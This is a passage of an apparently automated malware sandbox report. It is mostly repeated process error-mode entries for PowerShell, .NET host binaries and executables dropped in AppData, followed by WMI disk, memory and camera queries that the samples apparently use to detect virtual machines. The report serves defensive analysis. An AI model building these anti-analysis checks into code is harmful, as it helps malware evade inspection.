Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

